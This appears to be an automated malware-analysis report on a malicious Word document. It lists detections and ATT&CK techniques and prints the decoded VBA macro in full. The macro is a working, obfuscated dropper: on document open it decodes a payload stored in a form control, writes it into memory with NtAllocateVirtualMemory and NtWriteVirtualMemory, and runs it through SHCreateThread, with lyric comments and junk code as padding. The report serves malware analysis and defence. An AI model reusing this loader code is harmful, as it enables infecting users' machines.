Verdict: MALICIOUS
Risk Score: 110
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing VBA macros, as indicated by the critical ClamAV detection and heuristic firings. The 'Document_Open' macro and the 'SE_ENABLE_LURE' heuristic suggest the document attempts to trick the user into enabling macros to execute malicious code. The VBA script appears to be obfuscated, making it difficult to determine the exact payload, but its presence strongly indicates a dropper functionality.
Heuristics (5)
- ClamAV: Doc.Dropper.ZwMacros-6057750-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim marbled As Long
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    - http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13782 bytes | d8f37d0c27e71bbc1cbb67fcb61526d1169e2a4b353baeb050cf54716ecae625 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim marbled As Long
Dim philosophy As Variant
ceruse = "movableness"
predestine
neutrino = 46
uncleanly = 16906
alundum = 229440
blearedness = SLN(alundum, uncleanly, neutrino)
End Sub
Sub predestine()
Dim epizoic As Variant
Dim endoscopy As String
lowrise = ThisDocument.ComputeStatistics(wdStatisticPages)
mooncalf.review.Value = lowrise + 9
localized = "inconceivableness"
diestrus = "things"
baldness = "de" & "meri" & "t"
Set putdown = mooncalf.review.SelectedItem
vehement = 15
jacksonian = 33516
heavensent = 411417
manis = SLN(heavensent, jacksonian, vehement)
khamti = putdown.Name
capillata = 118 + 50 + 7292
landwehr = Right(khamti, capillata)
colleen = selfaddressed.nonsuccess(landwehr)
casing = 7
come = 9798
augusta = 239618
come = Pmt(0.071, casing, -2400, augusta, 1)
alleviation = "embarrass"
amsonia = "dem" & "onetization"
#If Win64 Then
Dim maturational As Long
Dim condense As LongPtr
Dim ean As LongPtr
Dim workweek As Integer
#Else
Dim hooflike As Byte
Dim ean As Long
Dim huff As Variant
Dim condense As Long
#End If
chalice = 0
impudence = "mesoderm"
grapnel = 4096
aboideau = 29
america = 27171
adamantine = 169122
america = Pmt(0.0765, aboideau, -24239, adamantine, 1)
trichotomy = "acknowledgeable"
jeroboam = "easternmost"
awayness = "symptom"
cryptoprocta = 32
woodworm = 37179
pinned = 158715
loire = SLN(pinned, woodworm, cryptoprocta)
precautions = colleen
somali = "servans"
unquestioning = "aoritis"
condense = tytonidae(precautions)
tracasserie = "propriety"
bushtit = "judiciary"
#If Win64 Then
Dim indecisively As Integer
Dim monsoon As LongPtr
Duplicate = "faultfinding"
embezzle = "spleenish"
effigies = "disdainfully"
Dim furfur As LongPtr
flailing = 33 - 33 + 1280
#ElseIf Win32 Then
melodically = "menispermaceae"
phonics = "delawarean"
selfdenial = "niceness"
Dim monsoon As Long
arrest = 36 + 478
Dim furfur As Long
flailing = arrest + 3204
#End If
Dim auricularia As Long
Dim bouleverser As String
monsoon = 104 + 23 - 127
ean = condense + flailing
furfur = 1
trisulcate = unapprized(ean, monsoon, furfur, monsoon)
nnumber = 42
biretta = 21067
applejack = 321359
equate = SLN(applejack, biretta, nnumber)
End Sub
Function tytonidae(mender)
Dim aeciospore As Long
Dim spinelessness As Integer
Dim cubic As String
Dim nacimiento As Variant
#If Win64 Then
Dim cakile As Byte
Dim claustrophobic As LongPtr
unclutch = 8
Dim dodo As String
Dim debriefing As LongPtr
Dim missay As Integer
Dim atonality As LongPtr
Dim pants As Integer
#Else
Dim choregus As Long
Dim claustrophobic As Long
unclutch = 4
Dim debriefing As Long
Dim milkman As String
Dim atonality As Long
Dim toxicodendron As String
Dim exemplary As Long
#End If
caryatid = catsear(VarPtr(claustrophobic), VarPtr(mender) + 8, unclutch)
operate = -1
debriefing = 0
feminate = 0
atonality = 29 - 59 + 31 + 9587
hepaticopsida = 34 + 75 + 88 + 3899
equipollent = 40 + 24
depose = discoglossidae(ByVal operate, debriefing, ByVal feminate, atonality, ByVal hepaticopsida, ByVal equipollent)
affably = ammodytes / 287
affably = affably - 358
catsear debriefing, claustrophobic, 60 + 5534
catenation = 43
capriole = 29517
nuances = 302286
autologous = SLN(nuances, capriole, catenation)
tytonidae = debriefing
End Function
Sub upper()
Dim InitialCaps As Range
Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
End:=ActiveDocument.Words(3).End)
InitialCaps.Case = wdUpperCase
End Sub
Function catsear(quidem, apopemptic, bonnily)
#If Win64 Then
Dim pyocyanase As Variant
Dim chancellorsville As String
Dim algorism As LongPtr
Dim sediment As LongPtr
Dim belemnitidae As LongPtr
Dim chasser As String
Dim thuggery As LongPtr
Dim detachment As LongPtr
#Else
Dim sediment As Long
Dim primitively As Integer
Dim algorism As Long
Dim ballot As Integer
Dim thuggery As Long
Dim amrinone As Byte
Dim belemnitidae As Long
Dim pathway As Variant
Dim detachment As Long
Dim almanac As Variant
Dim abient As Integer
#End If
checkpoint = matutinal
affably = Fix(117.376 + 114.2197)
sediment = quidem
detachment = bonnily
ail = ail
thuggery = apopemptic
huffing = 16
crisis = 28804
nasally = 141610
coagency = SLN(nasally, crisis, huffing)
matutinal = catchpenny
algorism = 96 + 109 + 87 - 293
carnally ByVal algorism, sediment, thuggery, detachment, belemnitidae
affably = ammodytes And 451
End Function
Attribute VB_Name = "selfaddressed"
' And when I doubt
' You remind me of just how lucky I am
' Because it's the hardest thing I've ever done
#If Win64 Then
' You remind me of just how lucky I am
' You always seem
' Because it's the hardest thing I've ever done
Public Declare PtrSafe Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal saxony As LongPtr, ByVal abuna As Any, ByVal sarawakian As LongPtr, ByVal salmo As LongPtr) As LongPtr
' You surprise me with
' Sometimes I doubt the path I chose
' And my bad examples
Public Declare PtrSafe Function appreciably Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal heraldry As LongPtr,algometry As LongPtr,blowfly As LongPtr,bruin As LongPtr,conclusive As LongPtr) As Boolean
' You're my belief
' Sometimes my dreams feel all on hold
' There's no doubt that this will make me strong
Public Declare PtrSafe Function ascription Lib "Shell32.dll" Alias "SHGetDesktopFolder" (myoma As LongPtr)
' If you are dreaming
' Just how perfect you are
' Just how perfect you are
Public Declare PtrSafe Function distended Lib "Kernel32.dll" Alias "LocalFree" (literati As LongPtr) As LongPtr
' Just how perfect you are
' The stronger one
' Because it's the hardest thing I've ever done
Public Declare PtrSafe Function discoglossidae Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (cristobalite As LongPtr, dummy As LongPtr, ByVal welloff As LongPtr,pharisaismByVal As LongPtr, accipiter As LongPtr, ByVal ar As LongPtr) As LongPtr
' If you are dreaming
' You surprise me with just how perfect you are
' You remind me of just how perfect you are
Public Declare PtrSafe Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal chippendale As Any, ByVal chudder As Any, ByVal elbows As Any, ByVal churchdoor As Any, ByVal pyrrhus As Any) As LongPtr
' You remind me of just how lucky I am
' Even with all my flaws
' You surprise me with just how perfect you are
Public Declare PtrSafe Function already Lib "Shell32.dll" Alias "SHGetSettings" (freshet As LongPtr,caruncle As LongPtr) As LongPtr
' I never want to wake you up
' Out in the world that's beyond my control
' When I'm at my wit's end
Public Declare PtrSafe Function atlantes Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (vat As LongPtr, abutter As Any,haystack As LongPtr, fit As Any) As Boolean
' Because it's the hardest thing I've ever done
' I'm suppose to be
' I never want to wake you up
' I never want to wake you up
'
' You search for me
#Else
' The stronger one
' And when I'm lost
' I'm suppose to be
Public Declare Function solanum Lib "Kernel32.dll" Alias "LocalFree" (spartan As Long) As Long
' You're my belief
' You always seem
' Still, I hold my breath each time you go
Public Declare Function bargainpriced Lib "Shell32.dll" Alias "SHGetSettings" (geared As Long, followon As Long) As Long
' Just how perfect you are
'
' And my bad examples
Public Declare Function toastmaster Lib "Shell32.dll" Alias "SHGetDesktopFolder" (aedes As Long)
' Sometimes my dreams feel all on hold
' Because it's the hardest thing I've ever done
' And I'm losing my head
Public Declare Function latimeridae Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (gorgonocephalus As Long, gradeconstructed As Any, beelzebub As Long, lhonneur As Any) As Boolean
' Because it's the hardest thing I've ever done
' You're my belief
' Sometimes my dreams feel all on hold
Public Declare Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal affirm As Long, ByVal panonychus As Any, ByVal losing As Any, ByVal harmonically As Any) As Long
' You surprise me with just how perfect you are
' Because it's the hardest thing I've ever done
' You're my belief
Public Declare Function chimakum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal conversation As Long, hello As Long, reovirus As Long, skater As Long, givenness As Long) As Boolean
' And I'm losing my head
' And when I'm lost
' You remind me of just how lucky I am
Public Declare Function discoglossidae Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (flexible As Long, endodontist As Long, ByVal allocution As Long, bissextileByVal As Long, dragonnade As Long, ByVal gangrenous As Long) As Long
' You surprise me with
' You remind me of just how perfect you are
' You surprise me with just how perfect you are
Public Declare Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal accueil As Any, ByVal collapsible As Any, ByVal romanian As Any, ByVal hejira As Any, ByVal sorceress As Any) As Long
' Still, I hold my breath each time you go
' Just how perfect you are
' To prove that theory wrong
' I'm suppose to be
' And when I doubt
' The stronger one
#End If
' You surprise me with
' Still, I hold my breath each time you go
' And my bad examples
Function bifilar(emperor)
bifilar = AscW(emperor)
End Function
Function nonsuccess(caboose) As String
Dim coltsfoot As Variant
checkpoint = ail
Dim remonetize As Integer
Dim sembarquer(63) As Long
Dim cuban As Long
Dim blackberry As String
Dim indisputable(63) As Long
Dim gracilariid As Long
Dim deuterogamy As Variant
Dim kudzu(6965) As Byte
Dim ichneumon(63) As Long
Dim sidewheeler As Long
Dim rower As Long
affably = Rnd(363.395 + 288.6023)
Dim regiment As Variant
Dim bootlace() As Byte
catchpenny = "gouache"
dithering = 16 + 104 - 86 + 16515038
Dim aztreonam As Long
allhallows = 255
proctor = 64
caredfor = 33 + 5 + 65242
testaceology = 262144
Dim albification As Variant
Dim gainful As Variant
hesitancy = 258048
nervousness = 4032
luger = 63
slog = 79 + 4017
ambergris = 62 + 59 + 77 + 16711482
gvisum = 126 + 117 + 13
cymbid = 65536
Dim affluence As Long
palace = 53 - 53
armorclad = 51 - 53 + 7461
Dim gilbert() As Byte
gilbert = VBA.StrConv(caboose, vbFromUnicode)
Dim markbelow As String
fierily = 16
oiling = 12156
outspeak = 374597
oiling = Pmt(0.068, fierily, -22301, outspeak, 0)
fain = 7459
lanthanum = 35
authenticate = Log(100) / Log(10) + 14
For affirmance = 0 To fain
If affirmance Mod 2 = 0 Then
gilbert(affirmance) = gilbert(affirmance) + authenticate
Else
gilbert(affirmance) = gilbert(affirmance) + authenticate - 1
End If
Next affirmance
steprelationship = 37
platyrrhini = 13272
ingenuousness = 253747
cheekbone = SLN(ingenuousness, platyrrhini, steprelationship)
remonetize = 0
schemist = 0
filigree = 43
pipelaying = immunity
For gracilariid = 0 To 63
indisputable(gracilariid) = choriotis(gracilariid, proctor, 3)
sembarquer(gracilariid) = choriotis(gracilariid, slog, 3)
ichneumon(gracilariid) = choriotis(gracilariid, testaceology, 3)
Next gracilariid
chrome = 99
moo = 18434
braise = 504435
moo = Pmt(0.066, chrome, -36184, braise, 0)
bootlace = gilbert
childcare = 37 + 77 + 42 - 152
chionanthus = 39
photomechanical = 21321
loyalty = 164804
prepared = SLN(loyalty, photomechanical, chionanthus)
basilica = 3
checkpoint = checkpoint
ammodytes = VBA.Math.Round(198.4053 + 497.5379)
aggressiveness = basilica + 1
airy = 2
For rower = 0 To fain
cretin = bootlace(rower)
deceleration = bootlace(rower + 2)
sidewheeler = ichneumon(pipelaying(cretin)) _
+ sembarquer(pipelaying(bootlace(rower + 1))) + indisputable(pipelaying(deceleration)) + pipelaying(bootlace(rower + basilica))
gracilariid = choriotis(sidewheeler, ambergris, 2)
kudzu(cuban) = choriotis(gracilariid, cymbid, 1)
gracilariid = choriotis(sidewheeler, caredfor, 2)
kudzu(cuban + 1) = choriotis(gracilariid, gvisum, 1)
kudzu(cuban + airy) = choriotis(sidewheeler, allhallows, 2)
cuban = cuban + airy + 1
rower = rower + 3
Next
nonsuccess = kudzu
End Function
Function immunity()
Dim dicta(255) As Byte
nephew = 65
Do
dicta(nephew) = nephew - 65
nephew = nephew + 1
Loop Until nephew = 91
nephew = 48
Do
dicta(nephew) = nephew + 4
nephew = nephew + 1
Loop Until nephew = 58
nephew = 97
Do
dicta(nephew) = nephew - 71
nephew = nephew + 1
Loop Until nephew = 123
dicta(47) = 63
nephew = 43
dicta(nephew) = 62
immunity = dicta
End Function
Function choriotis(anxiousness, tuille, capillarity)
Select Case capillarity
Case 1
choriotis = anxiousness \ tuille
Case 2
choriotis = anxiousness And tuille
Case 3
choriotis = anxiousness * tuille
End Select
End Function
Sub add()
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers
.IncludeChapterNumber = True
.ChapterPageSeparator = wdSeparatorEnDash
End With
End Sub
Attribute VB_Name = "mooncalf"
Attribute VB_Base = "0{957FDB00-5366-4A10-B75E-6F214022514C}{C30BDC94-A2FA-4B6F-926E-B993C2F5607B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False